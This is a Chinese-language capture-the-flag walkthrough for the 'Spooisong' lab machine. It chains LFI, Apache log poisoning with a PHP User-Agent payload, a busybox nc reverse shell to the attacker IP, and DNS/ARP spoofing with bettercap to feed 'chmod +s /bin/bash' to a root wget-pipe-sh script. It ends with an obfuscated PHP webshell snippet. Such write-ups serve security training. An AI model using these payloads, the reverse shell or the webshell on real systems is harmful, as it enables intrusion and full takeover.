Spooisong

靶机ip:192.168.108.135

攻击机ip:192.168.108.50

1 2	Kal ddddx ~ ❯ export ip=192.168.108.135 ✘ 255 took 12m 7s at 08:54:34 Kal ddddx ~ ❯ rustscan -a $ip

图片.png

就发现一个80端口，访问一下是个默认页面，爆破目录

1	Kal ddddx ~ ❯ feroxbuster -u http://192.168.108.135 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

图片.png

发现kavin中存在index.php

尝试访问kavin页面

图片.png

在也面跳转中发现了一个非常典型的 参数包含型页面结构，很有可能存在 本地文件包含漏洞（LFI）

http://192.168.108.135/kavin/
http://192.168.108.135/kavin/inc.php?i=about
http://192.168.108.135/kavin/inc.php?i=services
http://192.168.108.135/kavin/inc.php?i=portfolio
http://192.168.108.135/kavin/inc.php?i=pricing

这个参数 i=about 明显是在控制引入的页面内容，可能背后执行了：

include($_GET['i'] . '.php');

尝试使用FFUF进行LFI攻击

Kal ddddx ~ ❯ ffuf -u 'http://192.168.108.135/kavin/inc.php?i=FUZZ'  -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -fs 0

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.108.135/kavin/inc.php?i=FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

/etc/security/group     [Status: 200, Size: 3635, Words: 690, Lines: 107, Duration: 1ms]
/etc/security/limits    [Status: 200, Size: 2752, Words: 835, Lines: 68, Duration: 2ms]
:: Progress: [929/929] :: Job [1/1] :: 73 req/sec :: Duration: [0:00:02] :: Errors: 0 ::

我们发现确实存在LFI漏洞，但奇怪的是其他访问返回为空，可能添加了过滤或其他防御手段，通常 Linux 系统中的配置文件应该以 .conf 结尾（如 limits.conf），但现在却能直接读取名为 limits 和 group 的文件，结合一下，我们猜测包含时自动加了 .conf或者文件不带后缀
拿一下Apache 虚拟主机的配置文件 000-default

Kal ddddx ~ ❯ curl "http://192.168.108.135/kavin/inc.php?i=../../../../../../etc/apache2/sites-enabled/000-default"
<VirtualHost *:80>
        # The ServerName directive sets the request scheme, hostname and port that
        # the server uses to identify itself. This is used when creating
        # redirection URLs. In the context of virtual hosts, the ServerName
        # specifies what hostname must appear in the request's Host: header to
        # match this virtual host. For the default virtual host (this file) this
        # value is not decisive as it is used as a last resort host regardless.
        # However, you must set it for any further virtual host explicitly.
        #ServerName www.example.com

        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html

        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
        # error, crit, alert, emerg.
        # It is also possible to configure the loglevel for particular
        # modules, e.g.
        #LogLevel info ssl:warn

        ErrorLog /var/www/kavin-logs/error.log
        CustomLog /var/www/kavin-logs/access.log combined

        # For most configuration files from conf-available/, which are
        # enabled or disabled at a global level, it is possible to
        # include a line for only one particular virtual host. For example the
        # following line enables the CGI configuration for this host only
        # after it has been globally disabled with "a2disconf".
        #Include conf-available/serve-cgi-bin.conf
</VirtualHost>

网站的根目录是 /var/www/html
Apache 的访问日志位于：/var/www/kavin-logs/access.log

可以尝试伪造UA，反弹一个shell和攻击机连接

Kal ddddx ~ ❯ curl "http://192.168.108.135/kavin/inc.php?i=/var/www/kavin-logs/access"

192.168.108.128 - - [26/May/2025:17:19:05 +0200] "GET /kavin/inc.php?i=/var/www/kavin-logs/access HTTP/1.1" 200 149 "-" "curl/8.13.0-rc2"
Kal ddddx ~ ❯ curl -A "<?php system('id'); ?>"  http://192.168.108.135/
<html>
<body>
  <h1>It works!</h1>
  <p>This is the default web page for this server.</p>
  <p>The web server software is running but no content has been added, yet.</p>
</body>
</html>
Kal ddddx ~ ❯ curl "http://192.168.108.135/kavin/inc.php?i=/var/www/kavin-logs/access"

192.168.108.128 - - [26/May/2025:17:19:05 +0200] "GET /kavin/inc.php?i=/var/www/kavin-logs/access HTTP/1.1" 200 149 "-" "curl/8.13.0-rc2"
192.168.108.128 - - [26/May/2025:17:19:23 +0200] "GET /kavin/inc.php?i=/var/www/kavin-logs/access HTTP/1.1" 200 312 "-" "curl/8.13.0-rc2"
192.168.108.128 - - [26/May/2025:17:21:52 +0200] "GET / HTTP/1.1" 200 438 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)"
Kal ddddx ~ ❯ curl -A "<?php system('busybox nc 192.168.108.50 5555 -e /bin/bash'); ?>" http://192.168.108.135/
<html>
<body>
  <h1>It works!</h1>
  <p>This is the default web page for this server.</p>
  <p>The web server software is running but no content has been added, yet.</p>
</body>
</html>
Kal ddddx ~ ❯ curl "http://192.168.108.135/kavin/inc.php?i=/var/www/kavin-logs/access"

进去之后进行信息收集，一番搜寻之后没有明显线索，传入linpeas.sh和pspy64进行扫描也没发现有什么东西，看教程说是suraxddq账户的密码就是用户名

(remote) www-data@spooisong:/var/www/html/kavin$ curl 192.168.108.50:8000/linpeas.sh -o /tmp/linpeas.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--   100  820k  100  820k    0     0  65.6M      0 --:--:-- --:--:-- --:--:-- 66.7M
(remote) www-data@spooisong:/var/www/html/kavin$
(remote) www-data@spooisong:/var/www/html/kavin$ curl 192.168.108.50:8000/pspy64 -o /tmp/pspy64
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--   100 3032k  100 3032k    0     0   186M      0 --:--:-- --:--:-- --:--:--  197M
(remote) www-data@spooisong:/var/www/html/kavin$
(remote) www-data@spooisong:/var/www/html/kavin$ cd /tmp/
(remote) www-data@spooisong:/tmp$ ls
linpeas.sh  pspy64
(remote) www-data@spooisong:/tmp$ chmod +x linpeas.sh
(remote) www-data@spooisong:/tmp$ chmod +x pspy64

(remote) www-data@spooisong:/tmp$ cat /etc/passwd
....
suraxddq:x:1000:1000:suraxddq:/home/suraxddq:/bin/bash
(remote) www-data@spooisong:/tmp$ su suraxddq
Password:
suraxddq@spooisong:/tmp$

进去之后sudo -l一下，发现suraxddq 用户在目标机器 spooisong 上可以 **以 root 身份（无密码）执行 /var/backups/dns，**查看一下脚本内容

suraxddq@spooisong:/tmp$ sudo -l
Matching Defaults entries for suraxddq on spooisong:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User suraxddq may run the following commands on spooisong:
    (root) NOPASSWD: /var/backups/dns

suraxddq@spooisong:/tmp$ file /var/backups/dns
ls -l /var/backups/dns
bash: file: orden no encontrada
-rwx---r-- 1 root root 78 sep  2  2024 /var/backups/dns
suraxddq@spooisong:/tmp$ cat /var/backups/dns
#!/bin/bash

/usr/bin/wget -O- "http://sp00is0ng.nyx/configure" | /usr/bin/sh

这里没有写入权限，我们采用DNS 欺骗 + ARP欺骗 + HTTP 代理把目标请求的 sp00is0ng.nyx 指到我们的 Kali 上，并伪造响应
先设置 DNS 欺骗，让所有请求 sp00is0ng.nyx 域名的 DNS 请求都被劫持，解析到我们的 Kali 机器 IP 192.168.108.50

Kal ddddx ~ ❯ sudo bettercap                                               at 18:44:13
[sudo] password for ddddx:
bettercap v2.33.0 (built for linux amd64 with go1.22.6) [type 'help' for a list of commands]

192.168.108.0/24 > 192.168.108.50  » [18:44:24] [sys.log] [inf] gateway monitor started ...
192.168.108.0/24 > 192.168.108.50  » set dns.spoof.domains sp00is0ng.nyx
192.168.108.0/24 > 192.168.108.50  » set dns.spoof.address 192.168.108.50
192.168.108.0/24 > 192.168.108.50  » set arp.spoof.targets 192.168.108.135
192.168.108.0/24 > 192.168.108.50  » dns.spoof on
[18:49:47] [sys.log] [inf] dns.spoof sp00is0ng.nyx -> 192.168.108.50
192.168.108.0/24 > 192.168.108.50  » [18:49:47] [sys.log] [inf] dns.spoof starting net.recon as a requirement for dns.spoof
192.168.108.0/24 > 192.168.108.50  » [18:49:47] [endpoint.new] endpoint 192.168.108.135 detected as 00:0c:29:af:07:e3 (VMware, Inc.).
192.168.108.0/24 > 192.168.108.50  » [18:49:47] [endpoint.new] endpoint 192.168.108.254 detected as 00:50:56:e4:4f:00 (VMware, Inc.).
192.168.108.0/24 > 192.168.108.50  » arp.spoof on
192.168.108.0/24 > 192.168.108.50  » [18:49:51] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.
192.168.108.0/24 > 192.168.108.50  »

启动一个 HTTP 服务器，响应 http://sp00is0ng.nyx/configure 的请求，返回准备好的恶意脚本


Kal ddddx ~ ❯ echo 'chmod +s /bin/bash' > configure               took 26s at 19:03:52

Kal ddddx ~ ❯ python -m http.server 80                                     at 19:04:00
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.108.135 - - [26/May/2025 19:04:05] "GET /configure HTTP/1.1" 200 -

最后去执行一下，提权就好

suraxddq@spooisong:/var/www/html/kavin$ ls -l /bin/bash
-rwxr-xr-x 1 root root 1265648 mar 29  2024 /bin/bash
suraxddq@spooisong:/var/www/html/kavin$ sudo /var/backups/dns
--2025-05-26 19:58:56--  http://sp00is0ng.nyx/configure
Resolviendo sp00is0ng.nyx (sp00is0ng.nyx)... 192.168.108.50, ::ffff:192.168.108.50
Conectando con sp00is0ng.nyx (sp00is0ng.nyx)[192.168.108.50]:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 19 [application/octet-stream]
Grabando a: «STDOUT»

-                  100%[================>]      19  --.-KB/s    en 0s

2025-05-26 19:58:56 (595 KB/s) - escritos a stdout [19/19]

suraxddq@spooisong:/var/www/html/kavin$ curl http://sp00is0ng.nyx/configure
chmod +s /bin/bash
suraxddq@spooisong:/var/www/html/kavin$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1265648 mar 29  2024 /bin/bash
suraxddq@spooisong:/var/www/html/kavin$ /bin/bash -p
suraxddq@spooisong:/var/www/html/kavin# id
uid=1000(suraxddq) gid=1000(suraxddq) euid=0(root) egid=0(root) grupos=0(root),1000(suraxddq)
suraxddq@spooisong:/var/www/html/kavin# whoami
root
suraxddq@spooisong:~# cd /root/
suraxddq@spooisong:/root# ls
root.txt
suraxddq@spooisong:/root# cat root.txt
3d7c0671c87e41cb601d60417992d817

<?php
if (isset($_POST['cmd']) && isset($_POST['access'])) {
    $reversed_access = strrev($_POST['access']); // 反转access参数
    $reversed_access($_POST['cmd']);            // 将反转后的access作为函数名,cmd作为参数执行
}
?>

如果您喜欢此博客或发现它对您有用，则欢迎对此发表评论。也欢迎您共享此博客，以便更多人可以参与。如果博客中使用的图像侵犯了您的版权，请与作者联系以将其删除。谢谢！

特色标签

链友